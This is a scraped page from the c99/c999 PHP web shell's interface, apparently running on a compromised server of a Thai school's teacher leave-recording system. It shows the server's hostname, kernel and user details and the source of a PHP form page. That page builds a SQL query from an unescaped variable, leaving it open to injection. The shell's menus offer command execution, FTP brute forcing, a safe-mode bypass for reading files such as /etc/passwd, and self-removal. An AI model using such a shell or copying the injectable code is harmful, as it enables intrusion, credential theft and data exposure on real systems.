!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage_22222/teacher_aj_viratt/Adsent/   drwxr-xr-x
Free 52.41 GB of 127.8 GB (41.01%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     Add_His_Absent.php (5.51 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
include("../../include/FunctionDB.php");
include(
"../../include/Function.php");
 
session_start();
 if (
session_is_registered("valid_user")&&session_is_registered("password"))
 {
 
$Username $valid_user;
 
$Password $password;
ConnectDB();
$sql "Select * From personal_tb  Where Teacher_code='$Teacher_code'";
$result mysql_query($sql) or die(" Error").mysql_error();
$rss mysql_fetch_array($result);
?>
<html>
<head>
<title>Add Absent 's data</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874">
<link href="../../css/style1.css" rel="stylesheet" type="text/css">
</head>

<body>
<table width="100%" border="0" align="center" cellpadding="0" cellspacing="1">
  <tr>
    <td colspan="3" bgcolor="#0066CC"><img src="../../Image/Ponallogo.jpg" width="550" height="71"></td>
  </tr>
  <tr> 
    <td width="20%" background="../../Image/barm.jpg" class="table"> 
      <div align="center"><strong><font size="2" face="Tahoma"><a href="../menu_teacher.php" class="d" >กลับหน้าหลัก</a></font></strong></div></td>
    <td width="20%" background="../../Image/barm.jpg" class="table"> 
      <div align="center"><strong><font size="2" face="Tahoma"><a href="AbsentList.php?Teacher_code=<? echo $rss[Teacher_code]?>" class="d">แสดง</a></font></strong></div></td>
    <td width="20%" background="../../Image/barm.jpg" class="table"> 
      <div align="center"><strong><font size="2" face="Tahoma"><a href="../../logout.php" class="d" >Logout</a></font></strong></div></td>
  </tr>
</table>
<table width="100%" border="0" align="center" cellpadding="0" cellspacing="0">
  <tr> 
    <td>&nbsp;</td>
  </tr>
</table>
<table width="100%" border="0" align="center" cellpadding="0" cellspacing="1" style="background-color:#eeeeee; border:1px solid gray"size="12">
  <form action="Insert_Absent.php" method="post">
    <tr> 
      <td colspan="3" bgcolor="#FDD88A"> 
        <div align="center"><font color="#000000" size="4" face="Tahoma"><strong>เพิ่มข้อมูลประวัติการลา</strong></font></div></td>
    </tr>
    <tr bgcolor="#FFFFFF"> 
      <td> 
        <div align="center"><font color="#003366" size="2" face="Tahoma">ชื่อ 
          - นามสกุล</font></div></td>
      <td>&nbsp;</td>
      <td><font color="#003366" size="2" face="Tahoma">&nbsp;&nbsp;<? echo $rss[First_name]?> 
        <? echo $rss[Teacher_name]?>&nbsp;<? echo $rss[Teacher_lastname]?></font></td>
    </tr>
    <tr bgcolor="#FFFFFF"> 
      <td width="17%"> 
        <div align="center"><font color="#003366" size="2" face="Tahoma">เริ่มลาวันที่</font></div></td>
      <td width="1%"><font size="2" face="Tahoma">&nbsp;</font></td>
      <td width="82%"> <font color="#000000" size="2" face="Tahoma">วันที่ 
        <select name="mDate" id="select3" class="select" >
          <? getDay1to31();?>
        </select>
        เดือน 
        <select name="mMonth" id="select4" class="select" >
          <? getThaiMonth();?>
        </select>
        ปี พ.ศ. 
        <input name="mYear" type="text" class="input1" id="mYear" size="5">
        </font><font size="2" face="Tahoma">&nbsp;<font color="#003366">ถึง </font></font><font color="#000000" size="2" face="Tahoma">&nbsp;&nbsp;วันที่ 
        <select name="mDate2" id="mDate2" class="select" >
          <? getDay1to31();?>
        </select>
        เดือน 
        <select name="mMonth2" id="select2" class="select" >
          <? getThaiMonth();?>
        </select>
        ปี พ.ศ. 
        <input name="mYear2" type="text" id="mYear2" size="5" class="input1" >
        </font></td>
    </tr>
    
    <tr bgcolor="#FFFFFF">
      <td><div align="center"><font color="#003366" size="2" face="Tahoma">ประเภทการลา</font></div></td>
      <td>&nbsp;</td>
      <td><font size="2" face="Tahoma"><strong><font color="#003366" size="2" face="Tahoma">
        <select name="Absent_code" id="Absent_code" class="input1">
          <?php
            $strSQL3 
"SELECT * FROM  history_absent01_tb ";//Where Absent_code='$Absent_code' ";
           
$result3 mysql_query($strSQL3);
                 while( 
$rs3 mysql_fetch_array($result3))     
                     {
                 echo
"<option value=\"$rs3[Absent_code]\" ><b>$rs3[Absent_type]</b></option>\n";
                }
                
CloseDB();  
                
          
?>
        </select>
      </font></strong></font></td>
    </tr>
    <tr bgcolor="#FFFFFF"> 
      <td> 
        <div align="center"><font color="#003366" size="2" face="Tahoma">จำนวนวันลา</font></div></td>
      <td>&nbsp;</td>
      <td><input name="Absent_times" type="text" id="Absent_times" size="10"></td>
    </tr>
    <tr bgcolor="#FFFFFF"> 
      <td> 
        <div align="center"><font color="#003366" size="2" face="Tahoma">การนับ</font></div></td>
      <td><font size="2" face="Tahoma">&nbsp;</font></td>
      <td><font size="2" face="Tahoma"> 
        <input type="radio" name="Unit_count" value="นับครั้ง">
        นับครั้ง 
        <input type="radio" name="Unit_count" value="ไม่นับครั้ง">
        ไม่นับครั้ง</font></td>
    </tr>
    <tr> 
      <td colspan="3" bgcolor="#FDD88A"> 
        <div align="center"> 
          <input type="hidden" name="Teacher_code" value="<? echo $rss[Teacher_code]?>">
          <input type="submit" name="Submit" value="  เพิ่ม  " class="button">
          &nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 
          <input type="reset" name="Submit" value="Reset" class="button">
        </div></td>
    </tr>
  </form>
</table>
</body>
</html>
<?php 
    
}
else
{
       echo
"<meta http-equiv=\"refresh\" content=\"3;URL=../../login.php\">\n";
       echo
"Please Login ";
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0059 ]--